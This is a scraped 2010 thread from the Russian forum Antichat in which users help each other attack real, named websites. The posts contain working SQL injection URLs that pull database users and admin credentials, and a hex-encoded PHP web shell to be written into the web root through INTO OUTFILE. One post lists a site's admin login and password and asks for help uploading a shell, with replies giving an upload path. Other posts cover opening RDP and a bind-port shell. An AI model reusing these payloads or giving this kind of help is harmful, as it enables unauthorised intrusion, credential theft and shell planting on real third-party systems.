Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
03.02.2010, 17:06
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от $ereg@
вообщем есть скуля) пароли вытащил, но они мне оказались никчему(
теперь пробую залить шелл, делаю запрос :
-999+union+select+1,2,0x3c3f206563686f205c223c70726 53e5c223b4073797374656d28245f4745545b5c22636d645c2 25d293b6563686f205c223c2f7072653e5c223b3f3e,4,5,6+ INTO+OUTFILE+'/var/www/bans/z.php'--
В ответ получаю ошибку:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/var/www/bans/z.php-- ORDER BY date ASC' at line 1
пробовал убирать ковычки, дописывать ковычки, записывать путь в hex, ничего хорошего не вышло...
опытные кулхацкеры подскажите ламеру чё делать 
near '/var/www/bans/z.php--
путь не обрамлен ковычками, если ковычки слешируются try https://forum.antichat.ru/showpost.php?p=663815&postcount=39
других вариантов на сегодняшний день не имеется
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
03.02.2010, 20:07
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
Помогите парни залить шелл. Не могу понять куда можно... Если можно то поподробней
http://www.heel.com.ua
Админка внизу сайта
логин: admin
pass: shutnick
|
|
|
|
03.02.2010, 20:55
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
вот у меня вопрос по поводу открытия RDP на машине с Win. Там стоит мускул 5. Неоднократно открыл через скул рдп на mssql но есть ли возможность через мускул?
|
|
|
|
03.02.2010, 22:24
|
|
Участник форума
Регистрация: 15.01.2009
Сообщений: 158
Провел на форуме:
469704
Репутация:
26
|
|
Не могу больше ничего получить, не хватает думалки:
Код:
http://www.3g-peoplenet.com.ua/news/news_view.php?news_id=-9+union+select+1,concat_ws(0x3a,version(),user()),3,4,5,6,7,8,9,10,11,12+from+information_schema.tables--
Что из этого можно вытянуть?
77-log:3g-administrator@localhost |
|
|
|
03.02.2010, 23:03
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
а там ничего толкового не получишь...
Код:
http://www.3g-peoplenet.com.ua/news/news_view.php?news_id=-9+union+select+1,2,3,4,5,6,7,concat_ws%280x3a,admin_id,admin_name%29,9,10,11,12+from+admin--
колонки с пассами нет(( |
|
|
|
04.02.2010, 00:24
|
|
Познающий
Регистрация: 12.06.2008
Сообщений: 32
Провел на форуме:
324402
Репутация:
22
|
|
Сообщение от Assembler
Помогите парни залить шелл. Не могу понять куда можно... Если можно то поподробней
http://www.heel.com.ua
Админка внизу сайта
логин: admin
pass: shutnick
/var/www/heelezTH/heel.com.ua/fckeditor/editor/filemanager/browser/default/connectors/php/commands.php
http://www.heel.com.ua/index.php?view=news&id=-487+UNION+SELECT+1,2,CONCAT%28Version%28%29,Databa se%28%29,User%28%29%29,4,5,6,7,8--%20+
|
|
|
|
04.02.2010, 19:37
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
все зделаю и ок..а в конце не полуцается..
а зацем ??
http://www.kane.dk/index.php?menuID=2&pageID=-2+union+select+0,1,group_concat(char(60,98,114,62) ,0x3a,g_id,0x3a,g_userName,0x3a,g_hashedPassword), 3+from+g2_User
|
|
|
|
04.02.2010, 19:40
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Таблица в другой базе данных
http://www.kane.dk/index.php?menuID=2&pageID=-2+union+select+0,1,group_concat(char(60,98,114,62) ,0x3a,g_id,0x3a,g_userName,0x3a,g_hashedPassword), 3+from+usr_web0_2.g2_User
|
|
|
|
04.02.2010, 19:58
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
spasibo ElteRUS
|
|
|
|
05.02.2010, 10:06
|
|
Познающий
Регистрация: 11.09.2008
Сообщений: 94
Провел на форуме:
999862
Репутация:
19
|
|
делаю бинд порт на freebsd,проверяю
Код:
tcp 0 0 0.0.0.0:37695 0.0.0.0:* LISTEN
порт открылся,пробую приконектится
Код:
nc
Cmd line: xx.xx.xx.xx 37695
(UNKNOWN) [xx.xx.xx.xx] 37695 (?) : Connection timed out
в чем может быть проблема ? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
